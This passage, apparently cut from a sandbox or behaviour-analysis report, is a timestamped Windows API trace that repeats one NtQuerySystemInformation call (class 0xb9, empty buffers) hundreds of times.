SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0156.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0157.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0162.051] NtQuerySystemInformation 